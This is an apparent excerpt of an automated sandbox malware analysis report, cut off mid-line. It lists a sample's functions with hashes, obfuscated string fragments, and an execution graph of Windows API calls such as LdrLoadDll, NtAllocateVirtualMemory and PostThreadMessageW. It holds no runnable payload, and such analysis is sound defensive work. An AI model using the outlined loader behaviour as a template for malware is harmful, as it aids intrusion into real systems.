                                                                                  • Opcode Fuzzy Hash: 5c35964d372a50b9dde2d211fb5afa782e8764cb993b6caed3ad866a4e9c239b
                                                                                  • Instruction Fuzzy Hash: B14149B1D11219AFDB04CF99DC85AEEBFBCEF49750F10415AFA14E6240E7B19641CBA0
                                                                                  Function 02F676E8 Relevance: .1, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 96a2bb7d17fff6c7e212c1376b52a49f8c0d5cef31a7f08ad5dd112158e2e83a
                                                                                  • Instruction ID: 940016149a7d221215528f09ea56e1fae30372f92eca8dbb7f835ac6f164f4f3
                                                                                  • Opcode Fuzzy Hash: 96a2bb7d17fff6c7e212c1376b52a49f8c0d5cef31a7f08ad5dd112158e2e83a
                                                                                  • Instruction Fuzzy Hash: 0931F6B5A00649ABDB14DF98CC45EEFB7B9EF88700F108219FA18A7240D730A915CFA1
                                                                                  Function 02F67FD8 Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 94a82c4498f4d1b0e95ec0b7ea1ca81ca2c7b4922daa7e4067c0b91ec7171abf
                                                                                  • Instruction ID: 275594ce15234413fecb9b3dda755b550fc53bebae9c7e32a2be09adec9898d5
                                                                                  • Opcode Fuzzy Hash: 94a82c4498f4d1b0e95ec0b7ea1ca81ca2c7b4922daa7e4067c0b91ec7171abf
                                                                                  • Instruction Fuzzy Hash: 5F2119B5A00609ABDB14DF58CC45EEFB7B9EF89750F108609FA19A7240D770A911CFA1
                                                                                  Function 02F56A98 Relevance: .1, Instructions: 75COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 16c2821f280891899a9e68313e71bc139bf371e7fafb499ae6d7673af716ad82
                                                                                  • Instruction ID: d38fb352c507c5d954d7cab39b4d7d46f9e26242f804d82375c798197d7c991c
                                                                                  • Opcode Fuzzy Hash: 16c2821f280891899a9e68313e71bc139bf371e7fafb499ae6d7673af716ad82
                                                                                  • Instruction Fuzzy Hash: 0C11C6B63803047BF720AA159C43FAB775DDB85F91F244018FF04BA2C0D6A5B8054BB5
                                                                                  Function 02F63FB8 Relevance: .1, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a963d9050a1e0e323f199bfc6479a81a563f6cea96f5f214ffeda0f594bbcad
                                                                                  • Instruction ID: bcac14954143ea4d28e2593598487e78b958a8fe7dc2f158e9f7065f8e6935fa
                                                                                  • Opcode Fuzzy Hash: 2a963d9050a1e0e323f199bfc6479a81a563f6cea96f5f214ffeda0f594bbcad
                                                                                  • Instruction Fuzzy Hash: D7211FB6D0121DAF8B00DFA9DD419EFB7F9EF88200F14425AE919E7200E7705A158FA0
                                                                                  Function 02F67378 Relevance: .1, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2c73ea9a29ff6fbfe0c2461ad93a56da1e1894cea4a0b0c4cd0c26f7a324048f
                                                                                  • Instruction ID: b898c784b541fbb72aa5d6dbe7d8ac8e574b2651c16731dfe233b4f1351a0bbe
                                                                                  • Opcode Fuzzy Hash: 2c73ea9a29ff6fbfe0c2461ad93a56da1e1894cea4a0b0c4cd0c26f7a324048f
                                                                                  • Instruction Fuzzy Hash: F3112171A00749ABD714EB64CC45FFF736DEF85750F108509FA1967240D77069118FA1
                                                                                  Function 02F674F8 Relevance: .1, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 77588f1d4e723a07bc1d332243f565fcf741497e69ec14286f0500eb237ddae1
                                                                                  • Instruction ID: 0c918bafadb65bbfe81d7be6dcc67157445293cbfd649da7d7924fdce49a78fb
                                                                                  • Opcode Fuzzy Hash: 77588f1d4e723a07bc1d332243f565fcf741497e69ec14286f0500eb237ddae1
                                                                                  • Instruction Fuzzy Hash: 911181719002586BD710EB64CC45FBF77ADEF85750F108509FA1867280D7706901CFA1
                                                                                  Function 02F42539 Relevance: .1, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf1c31a69e63384c391405d1fd720d620fe092f4da754701660cca299fb23392
                                                                                  • Instruction ID: ab207e3fb1e241d6cae1a662456a801ae9d223ca66485b48783f51e98a3d24cc
                                                                                  • Opcode Fuzzy Hash: bf1c31a69e63384c391405d1fd720d620fe092f4da754701660cca299fb23392
                                                                                  • Instruction Fuzzy Hash: C811FAB1C21228AF8F44CFA9988459DBFF8FA49660B14866BE928E7351D7B046418FD4
                                                                                  Function 02F68318 Relevance: .0, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                  • Instruction ID: 2bf96f05ae39102c63dcf83ee63840b968c97f9ca9e5fac5981858bbd34eba63
                                                                                  • Opcode Fuzzy Hash: 6026bf6cc864f872e0decd95382298bf67d59534e48f70a3e9034452c955bd55
                                                                                  • Instruction Fuzzy Hash: 6601C4B2210109BBCB04DF99DC84EDB77ADEF8C750F008208BA0DE3240D670E8518BA4
                                                                                  Function 02F4268C Relevance: .0, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3ede5c712596dd4a285a7fbbcdcab6cd00d7e278a3e7e2c11ac77a3fdfc0691d
                                                                                  • Instruction ID: 913b4ecd04f43a4afbce95d0b2f4b54307b8a39908769c9bc597cda7ab05ced0
                                                                                  • Opcode Fuzzy Hash: 3ede5c712596dd4a285a7fbbcdcab6cd00d7e278a3e7e2c11ac77a3fdfc0691d
                                                                                  • Instruction Fuzzy Hash: 92F02B7350421627DB102A6EAC40B86BF9CEB85378F241232FF5897241DA71E8118BA0
                                                                                  Function 02F63F28 Relevance: .0, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e75dd162cd450f326c9c721378bea543130eb237317d2c9f3042ee2795566d9
                                                                                  • Instruction ID: 7c0380a5348db469ee376fcc882efabd8d54880e94e6073c90f6c7a853c96c6b
                                                                                  • Opcode Fuzzy Hash: 4e75dd162cd450f326c9c721378bea543130eb237317d2c9f3042ee2795566d9
                                                                                  • Instruction Fuzzy Hash: 2601DBF2C11218AFCB41DFE8D9409EEBBF9AB08240F14466AD915F3200F7745A048FA5
                                                                                  Function 02F675F8 Relevance: .0, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 53640a4673118af59d00b1ed5a23bda9d24756024376f34d47fbb2a30d0ff4b3
                                                                                  • Instruction ID: 6e96ee49016ff1dec4e6fd9a1f085da484206549eba6dfc7923cd99cb04ee74d
                                                                                  • Opcode Fuzzy Hash: 53640a4673118af59d00b1ed5a23bda9d24756024376f34d47fbb2a30d0ff4b3
                                                                                  • Instruction Fuzzy Hash: 45F08CB6200209BFCB00DF88CC85EEB73ADEF89710F008508BE18A7200C770B8108BB0
                                                                                  Function 02F68248 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction ID: df2543163c07ffab73741234beede4ea00593773e4ef4b2b311b59f77cfd644b
                                                                                  • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction Fuzzy Hash: C7E09AB2200209BFDA10EE58DD49EEB37ADEFC9750F108018FA08A7241C770BC108BB4
                                                                                  Function 02F56BB8 Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ca1a6a713b3f01840001392278596669daafcc955991422778cdfdd8a1516e09
                                                                                  • Instruction ID: 348842ca3d3b1e8a6071fb6e484ed70c92d6bd37236429b9a60f692c9c4216c0
                                                                                  • Opcode Fuzzy Hash: ca1a6a713b3f01840001392278596669daafcc955991422778cdfdd8a1516e09
                                                                                  • Instruction Fuzzy Hash: 37F08271C0520CEBDB14DF64D841BDDBBB8EB04360F604369EE24DB280D6349750CB81
                                                                                  Function 02F6A0B8 Relevance: .0, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9a487808303671b97c9476ea5ed72f36a694bc16127d787400fee9bfe6dc4c83
                                                                                  • Instruction ID: 65347d59640aef43442c530f0286b16148c74e7e6120b7747036ef70808a5035
                                                                                  • Opcode Fuzzy Hash: 9a487808303671b97c9476ea5ed72f36a694bc16127d787400fee9bfe6dc4c83
                                                                                  • Instruction Fuzzy Hash: 76E08632A4061837D62055899C09FBB775DDBC6FA0F054164FF08EB340E6B0AD0447F5
                                                                                  Function 02F67F48 Relevance: .0, Instructions: 25COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction ID: b099d0f3d172619e8b67abbef62811452d3be22b69392911a89bfa15cc674c15
                                                                                  • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction Fuzzy Hash: DDE046362102487BD220AA59EC44E9B776DEFC6790F508515FB1DA7241C6B1B9118BE1
                                                                                  Function 02F49847 Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7a8b0ee8974525f7f8e5dd19b9d89adb90029ea89ca90e240209c67a680fd51c
                                                                                  • Instruction ID: 2bb2eedd6b1c8ecf92b02cd2de9ba67ca777eb42e1c2685b1b585143e36b8115
                                                                                  • Opcode Fuzzy Hash: 7a8b0ee8974525f7f8e5dd19b9d89adb90029ea89ca90e240209c67a680fd51c
                                                                                  • Instruction Fuzzy Hash: 5FB012C502124AA0190333426E000027F03AEC61B13F10953E285A9252D7A106202206

                                                                                  Non-executed Functions

                                                                                  Function 02F4229A Relevance: 52.6, Strings: 42, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (/2,$)/+2$)2,<$*(5<$*2.'$+2-$$+2/*$-$<O$-),$$-)5$.,-*$/)+2$/*<4$0<pu$2,2.$2./)$4Kur$<4/2$<KSK$<RH<$<^uh$O}zy$P0<p$Qsfu$WTHQ$Wuh3$]llp$l}e3$pp}3$rxyn$s5<_$tnsq$tnsq$u3)/$uwy<$wy<_$xsko$xyzy$y3(/$y<.,$yKy~$}z}n
                                                                                  • API String ID: 0-606234297
                                                                                  • Opcode ID: 233256df4e38f34ade6b8b4be724e10585e00c80c8c83108041821a983508e2a
                                                                                  • Instruction ID: 7a48e63b615d73debfc6dd815e1ca9301df07b2dc5f50292e474567751b5fb61
                                                                                  • Opcode Fuzzy Hash: 233256df4e38f34ade6b8b4be724e10585e00c80c8c83108041821a983508e2a
                                                                                  • Instruction Fuzzy Hash: FF41C0B4D0035CDEDB21CF96EA816DDBF70BB06340FA09298D5986F265C7705A82CF59
                                                                                  Function 02F59A88 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                  • API String ID: 0-392141074
                                                                                  • Opcode ID: 3d7a44e086a9f1cc54edf68e767842bd8c68ac6fd64c1b0aac01350b4c2ff7b9
                                                                                  • Instruction ID: 322bd4322ff5c236cc752c916039385271b8f2c18d2c5c357ea698d40a802575
                                                                                  • Opcode Fuzzy Hash: 3d7a44e086a9f1cc54edf68e767842bd8c68ac6fd64c1b0aac01350b4c2ff7b9
                                                                                  • Instruction Fuzzy Hash: F2713CB1C00228AADB25DBA4CC84FFEB779FF48741F044599E608B6150EB725B488FA1
                                                                                  Function 02F4D6E0 Relevance: 15.1, Strings: 12, Instructions: 119COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AlU$D$\$e$e$i$l$n$r$r$w$x
                                                                                  • API String ID: 0-3057419545
                                                                                  • Opcode ID: 65104fb58f75e1117cf55ea95fb4edef685dd0b4c0daa4bfcb11dbd4a37e0f64
                                                                                  • Instruction ID: c9d456f2ac797b85eb3ddf5e92f4b4c4c1207fe46aa8649a8de8daba7a4cf14f
                                                                                  • Opcode Fuzzy Hash: 65104fb58f75e1117cf55ea95fb4edef685dd0b4c0daa4bfcb11dbd4a37e0f64
                                                                                  • Instruction Fuzzy Hash: 46415FB1D41218AEDB10DF94CC85BEEBBB9FF48744F10815DE608B6180DBB556488FA4
                                                                                  Function 02F45DE8 Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$:$A$Q$R$g$i$v$z
                                                                                  • API String ID: 0-4110582197
                                                                                  • Opcode ID: b3cc2ef84429fa47600e700c5941e51520ebaee9a6eea40694d6ad822ec85025
                                                                                  • Instruction ID: da4373e090087322b827d13cb4969c6ddf5b3fef9cba52074569716fe300009d
                                                                                  • Opcode Fuzzy Hash: b3cc2ef84429fa47600e700c5941e51520ebaee9a6eea40694d6ad822ec85025
                                                                                  • Instruction Fuzzy Hash: 8A110010D0C7CED9DB12C6BC84047AEBF715F23214F0882D9D5E56B2D2D2B94605C7A6
                                                                                  Function 02F54BA4 Relevance: 10.1, Strings: 8, Instructions: 130COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .$P$e$i$m$o$r$x
                                                                                  • API String ID: 0-620024284
                                                                                  • Opcode ID: 1d91aef5dff2661140efb40f7c3fd32e10e9c1af89628b93aea7ac5e835f784c
                                                                                  • Instruction ID: 80c662743daa3b19344585731a005caf7d9b582f6f8499a2c2ae54cc1fe243dd
                                                                                  • Opcode Fuzzy Hash: 1d91aef5dff2661140efb40f7c3fd32e10e9c1af89628b93aea7ac5e835f784c
                                                                                  • Instruction Fuzzy Hash: 3941A9B1C40214BADB21EBA0CC44FEE777DEF54740F00859DA60DA7140EBB55B898FA1
                                                                                  Function 02F421C8 Relevance: 6.3, Strings: 5, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 92q$\$g-al$g-alre$re
                                                                                  • API String ID: 0-1518786521
                                                                                  • Opcode ID: 33449af82afbc51774a1d4bebbbea758dcf3b6e6180c029d309d392139d4530e
                                                                                  • Instruction ID: 7e2cf36f1506e2ce022b4c425c0345664c5cd5b0315eec86bd0e8db229644e25
                                                                                  • Opcode Fuzzy Hash: 33449af82afbc51774a1d4bebbbea758dcf3b6e6180c029d309d392139d4530e
                                                                                  • Instruction Fuzzy Hash: DEE092B1D0024CABDB00EFE8CD46BAEBB74EB05200F1049E9D9549B241E6B08A04CB81
                                                                                  Function 02F54D88 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 5$8$9$e
                                                                                  • API String ID: 0-2726392811
                                                                                  • Opcode ID: 58c56dc894ab0c7d2f6ebd9510ca3a1306f9f62ac618956b8278adf3864205c7
                                                                                  • Instruction ID: e980884a42f21fcbfba91dd7e481313b1b9fc3cbed3eedbf1285142443ad10dc
                                                                                  • Opcode Fuzzy Hash: 58c56dc894ab0c7d2f6ebd9510ca3a1306f9f62ac618956b8278adf3864205c7
                                                                                  • Instruction Fuzzy Hash: E03132B1910219BBEF04DF94CD45BFF77B9EF08344F004199EA04A7240EB76AA458BE5
                                                                                  Function 02F56198 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_2d10000_YpbicUfTwt.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $e$k$o
                                                                                  • API String ID: 0-3624523832
                                                                                  • Opcode ID: c108b9637ea4d62419d48dbfe5d3f70675fcb9d30319d79b50b718de9ec2c588
                                                                                  • Instruction ID: 24d7e8a9ff33a0c7260bfe6adafc2b2015014c4cd6bb02440bb3c2738d439658
                                                                                  • Opcode Fuzzy Hash: c108b9637ea4d62419d48dbfe5d3f70675fcb9d30319d79b50b718de9ec2c588
                                                                                  • Instruction Fuzzy Hash: D90184B2900218ABDB14DF99DCC4BDEF7B9FF48714F048219EA19AB241E7719945CFA0

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.6%
                                                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                                                  Signature Coverage:1.6%
                                                                                  Total number of Nodes:443
                                                                                  Total number of Limit Nodes:69
                                                                                  execution_graph 100406 6d9def 100408 6d9dff 100406->100408 100407 6d9e06 100408->100407 100410 6eb6f0 100408->100410 100413 6e99a0 100410->100413 100412 6eb709 100412->100407 100414 6e99bd 100413->100414 100415 6e99cb RtlFreeHeap 100414->100415 100415->100412 100417 6d0f60 100418 6d0f71 100417->100418 100423 6d4730 100418->100423 100420 6d0f98 100421 6d0fcc PostThreadMessageW 100420->100421 100422 6d0fdd 100420->100422 100421->100422 100424 6d4733 100423->100424 100425 6d475b 100424->100425 100426 6d4790 LdrLoadDll 100424->100426 100425->100420 100426->100425 100427 6d32e3 100432 6d7f50 100427->100432 100430 6d330f 100433 6d7f6a 100432->100433 100437 6d32f3 100432->100437 100441 6e8db0 100433->100441 100436 6e9660 NtClose 100436->100437 100437->100430 100438 6e9660 100437->100438 100439 6e967d 100438->100439 100440 6e968b NtClose 100439->100440 100440->100430 100442 6e8dcd 100441->100442 100445 2f535c0 LdrInitializeThunk 100442->100445 100443 6d803a 100443->100436 100445->100443 100816 6e62a0 100817 6e62fa 100816->100817 100818 6e6307 100817->100818 100820 6e3ca0 100817->100820 100821 6eb670 NtAllocateVirtualMemory 100820->100821 100822 6e3ce1 100821->100822 100823 6d4730 LdrLoadDll 100822->100823 100826 6e3dee 100822->100826 100824 6e3d27 100823->100824 100825 6e3d70 Sleep 100824->100825 100824->100826 100825->100824 100826->100818 100827 6e1d20 100830 6e1d39 100827->100830 100828 6e1d84 100829 6eb6f0 RtlFreeHeap 100828->100829 100831 6e1d94 100829->100831 100830->100828 100832 6e1dc7 100830->100832 100834 6e1dcc 100830->100834 100833 6eb6f0 RtlFreeHeap 100832->100833 100833->100834 100453 6d89f4 100455 6d8a04 100453->100455 100454 6d89b4 100455->100454 100457 6d7290 100455->100457 100458 6d72a6 100457->100458 100460 6d72df 100457->100460 100458->100460 100461 6d7100 LdrLoadDll 100458->100461 100460->100454 100461->100460 100462 6c9e70 100464 6ca243 100462->100464 100463 6ca68c 100464->100463 100466 6eb360 100464->100466 100467 6eb386 100466->100467 100472 6c4050 100467->100472 100469 6eb392 100471 6eb3cb 100469->100471 100475 6e5830 100469->100475 100471->100463 100479 6d33e0 100472->100479 100474 6c405d 100474->100469 100476 6e5892 100475->100476 100478 6e589f 100476->100478 100497 6d1ba0 100476->100497 100478->100471 100480 6d33fa 100479->100480 100482 6d3410 100480->100482 100483 6ea090 100480->100483 100482->100474 100485 6ea0aa 100483->100485 100484 6ea0d9 100484->100482 100485->100484 100490 6e8d10 100485->100490 100488 6eb6f0 RtlFreeHeap 100489 6ea149 100488->100489 100489->100482 100491 6e8d2d 100490->100491 100494 2f52c0a 100491->100494 100492 6e8d56 100492->100488 100495 2f52c11 100494->100495 100496 2f52c1f LdrInitializeThunk 100494->100496 100495->100492 100496->100492 100498 6d1bdb 100497->100498 100513 6d8060 100498->100513 100500 6d1be3 100501 6d1ec6 100500->100501 100524 6eb7d0 100500->100524 100501->100478 100503 6d1bf9 100504 6eb7d0 RtlAllocateHeap 100503->100504 100505 6d1c0a 100504->100505 100506 6eb7d0 RtlAllocateHeap 100505->100506 100508 6d1c1b 100506->100508 100512 6d1cb2 100508->100512 100531 6d6c00 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100508->100531 100509 6d4730 LdrLoadDll 100510 6d1e72 100509->100510 100527 6e8170 100510->100527 100512->100509 100514 6d808c 100513->100514 100515 6d7f50 2 API calls 100514->100515 100516 6d80af 100515->100516 100517 6d80b9 100516->100517 100518 6d80d1 100516->100518 100519 6d80c4 100517->100519 100521 6e9660 NtClose 100517->100521 100520 6d80ed 100518->100520 100522 6e9660 NtClose 100518->100522 100519->100500 100520->100500 100521->100519 100523 6d80e3 100522->100523 100523->100500 100532 6e9960 100524->100532 100526 6eb7eb 100526->100503 100528 6e81d2 100527->100528 100530 